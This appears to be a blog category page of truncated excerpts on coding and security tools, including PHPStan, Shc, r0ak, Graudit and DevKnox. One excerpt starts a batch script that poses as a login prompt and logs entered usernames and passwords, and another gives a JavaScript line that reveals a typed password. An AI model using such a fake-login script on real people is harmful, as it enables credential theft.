Browsing category

Secure Coding

PHPStan – PHP Static Analysis Tool

PHPStan focuses on finding errors in your code without actually running it. It catches whole classes of bugs even before you write tests for the code. It moves PHP closer to compiled languages in the sense that the correctness of each line of the code can be checked before you run the actual line. Prerequisites […]

ShC – Shell Script Compiler

Shc takes a script, which is specified on the command line and produces C source code. The generated source code is then compiled and linked to produce a stripped binary executable. The compiled binary will still be dependent on the shell specified in the first line of the shell code (i.e shebang) (i.e. #!/bin/sh), thus […]

r0ak – Ring 0 Army Knife

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.     Motivation The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands […]

Zero Day Attack Prevention: A Fundamental Pillar of Security

Preventing zero day attack, one of a developer’s worst nightmares. In this guide, we’ll tackle the A to Zs of these attacks. Keeping your software bug-free and challenging to compromise is one of the biggest challenges that you will ever face as a developer. For every person that wants to see you succeed in this […]

Learn to Code Ethereum DApps By Building Your Own Game

CryptoZombies is an interactive code school that teaches you to write smart contracts in Solidity through building your own crypto-collectables game. What is CryptoZombies? CryptoZombies is a free, interactive code school that teaches you to build games on Ethereum. The course is designed for beginners to Solidity and starts off with the absolute basics. So […]

Graudit – Grep Source Code Auditing Tool

Graudit (Grep rough audit) is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It’s comparable to other static analysis applications like RATS, SWAAT, and flaw-finder while keeping the technical requirements to a minimum and being very flexible. Usage: graudit <options> /path/to/scan […]

DevKnox – Autocorrect Security Issues As You Write Code

DevKnox is a first of its kind security tool that enables developers to detect and resolve security issues as they write code in Android Studio. While it checks for basic security issues, developers also get real-time suggestions to fix these issues instantly. Consider it to be like an autocorrect for security issues. Key features of Devknox: […]

Building your own Web Crawler

Web crawler is a program that browses the Internet (World Wide Web) in a predetermined, configurable and automated manner and performs given action on crawled content. Search engines like Google and Yahoo use spidering as a means of providing up-to-date data. Webhose.io, a company which provides direct access to live data from hundreds of thousands […]

How to create a keylogger in notepad

Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. ——————————————————————————————— @echo off color a title Login cls echo “Please Enter Email Adress And Password” echo. echo. cd “C:Logs” set /p user=Username: set /p pass=Password: echo Username=”%user%” Password=”%pass%” […]

Reveal Asterix Symbols with Javascript

How to do it 1) Open the Login Page of any website. E.g http://www.gmail.com 2) Type your ‘Username’ and ‘Password’. (DONT CLICK LOG IN) 3) Copy and paste the JavaScript code given below into your browser’s address bar and press ‘Enter’ on your keyboard. Quote:j alert(document.getElementById(‘Passwd’).value);   4) As soon as you press ‘Enter’, A […]

Learn to Code

For those of you who would like to code in their free time or just gain more knowledge in a preferred language ,then you should check this out. Here’s a list of sites that will make your coding experience unique , interesting and fun. Codecademy Codecademy is indisputably the most famous website to teach you […]